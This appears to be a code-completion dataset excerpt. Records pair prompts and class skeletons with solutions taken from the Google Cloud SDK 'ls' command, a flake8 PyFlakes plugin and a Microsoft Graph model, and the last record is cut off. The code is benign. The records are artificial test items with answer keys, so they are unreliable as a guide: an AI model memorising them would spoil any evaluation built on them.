Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n<|end_body_1|>\n", "class_docstring": "List Cloud Storage buckets and objects.", "class_name": "Ls", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. 
List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n<|end_body_0|>\n\n<|body_start_1|>\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000198", "length_bytes": 8020, "license_type": "permissive", "methods": [{"docstring": "Edit argparse.ArgumentParser for the command.", "name": "Args", "signature": "def Args(parser)"}, {"docstring": "Command execution logic.", "name": "Run", "signature": "def Run(self, args)"}], "n_methods": 2, "prompt": "Implement the Python class `Ls` described below.\n\nClass description:\nList Cloud Storage buckets and objects.\n\nMethod signatures and docstrings:\n- def Args(parser): Edit argparse.ArgumentParser for the command.\n- def Run(self, args): Command execution logic.", "prompted_full_text": "Implement the Python class `Ls` described below.\n\nClass description:\nList Cloud Storage buckets and objects.\n\nMethod signatures and docstrings:\n- def Args(parser): Edit argparse.ArgumentParser for the command.\n- def Run(self, args): Command execution logic.\n\n<|skeleton|>\nclass Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. 
If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n<|end_body_0|>\n\n<|body_start_1|>\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. 
Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n<|end_body_1|>\n", "revision_id": "392abf004b16203030e6efd2f0af24db7c8d669e", "skeleton": "<|skeleton|>\nclass Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. 
List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/surface/storage/ls.py", "source_repo": "google-cloud-sdk-unofficial/google-cloud-sdk", "split": "test", "star_events_count": 9} {"blob_id": "d50131fd4f3e378cc4ed773a7329192382337942", "bodies": ["filename = utils.normalize_paths(filename)[0]\nwith_doctest = self.with_doctest\nincluded_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\nif included_by:\n with_doctest = True\nfor exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\nsuper(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)", "parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\nparser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\nparser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\nparser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')", "if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\ncls.with_doctest = options.doctests\nincluded_files = []\nfor included_file in 
options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\ncls.include_in_doctest = utils.normalize_paths(included_files)\nexcluded_files = []\nfor excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\ncls.exclude_from_doctest = utils.normalize_paths(excluded_files)\ninc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\nif inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)", "for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)"], "bodies_text": "<|body_start_0|>\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n<|end_body_0|>\n\n<|body_start_1|>\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n<|end_body_1|>\n\n<|body_start_2|>\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' 
% inc_exc)\n<|end_body_2|>\n\n<|body_start_3|>\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n<|end_body_3|>\n", "class_docstring": "Subclass the Pyflakes checker to conform with the flake8 API.", "class_name": "FlakesChecker", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n <|body_0|>\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n <|body_1|>\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n <|body_2|>\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n<|end_body_0|>\n\n<|body_start_1|>\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n<|end_body_1|>\n\n<|body_start_2|>\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' 
% inc_exc)\n<|end_body_2|>\n\n<|body_start_3|>\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000199", "length_bytes": 5661, "license_type": "permissive", "methods": [{"docstring": "Initialize the PyFlakes plugin with an AST tree and filename.", "name": "__init__", "signature": "def __init__(self, tree, filename)"}, {"docstring": "Register options for PyFlakes on the Flake8 OptionManager.", "name": "add_options", "signature": "def add_options(cls, parser)"}, {"docstring": "Parse option values from Flake8's OptionManager.", "name": "parse_options", "signature": "def parse_options(cls, options)"}, {"docstring": "Run the plugin.", "name": "run", "signature": "def run(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005080", "prompt": "Implement the Python class `FlakesChecker` described below.\n\nClass description:\nSubclass the Pyflakes checker to conform with the flake8 API.\n\nMethod signatures and docstrings:\n- def __init__(self, tree, filename): Initialize the PyFlakes plugin with an AST tree and filename.\n- def add_options(cls, parser): Register options for PyFlakes on the Flake8 OptionManager.\n- def parse_options(cls, options): Parse option values from Flake8's OptionManager.\n- def run(self): Run the plugin.", "prompted_full_text": "Implement the Python class `FlakesChecker` described below.\n\nClass description:\nSubclass the Pyflakes checker to conform with the flake8 API.\n\nMethod signatures and docstrings:\n- def __init__(self, tree, filename): Initialize the PyFlakes plugin with an AST tree and filename.\n- def add_options(cls, parser): Register options for PyFlakes on the Flake8 OptionManager.\n- def parse_options(cls, options): Parse option values from Flake8's OptionManager.\n- def run(self): Run the plugin.\n\n<|skeleton|>\nclass FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n <|body_0|>\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n <|body_1|>\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n <|body_2|>\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n<|end_body_0|>\n\n<|body_start_1|>\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, 
help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n<|end_body_1|>\n\n<|body_start_2|>\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)\n<|end_body_2|>\n\n<|body_start_3|>\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n<|end_body_3|>\n", "revision_id": "0473ea71751d9086a835c6ae2d34d3bf0b149f4e", "skeleton": "<|skeleton|>\nclass FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n <|body_0|>\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n <|body_1|>\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n <|body_2|>\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', 
parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n", "source": "the_stack_v2_python_sparse", "source_path": "env/lib/python3.4/site-packages/flake8/plugins/pyflakes.py", "source_repo": "tlksio/tlksio", "split": "test", "star_events_count": 1} {"blob_id": "c2ada04b43ac6b8809c86914a506f66146c5cd0f", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn AccessReviewHistoryInstance()", "from .access_review_history_status import AccessReviewHistoryStatus\nfrom .entity import Entity\nfrom .access_review_history_status import AccessReviewHistoryStatus\nfrom .entity import Entity\nfields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_str_value('downloadUri', self.download_uri)\nwriter.write_datetime_value('expirationDateTime', self.expiration_date_time)\nwriter.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\nwriter.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\nwriter.write_datetime_value('reviewHistoryPeriodStartDateTime', 
self.review_history_period_start_date_time)\nwriter.write_datetime_value('runDateTime', self.run_date_time)\nwriter.write_enum_value('status', self.status)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n<|end_body_0|>\n\n<|body_start_1|>\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "AccessReviewHistoryInstance", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccessReviewHistoryInstance:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], 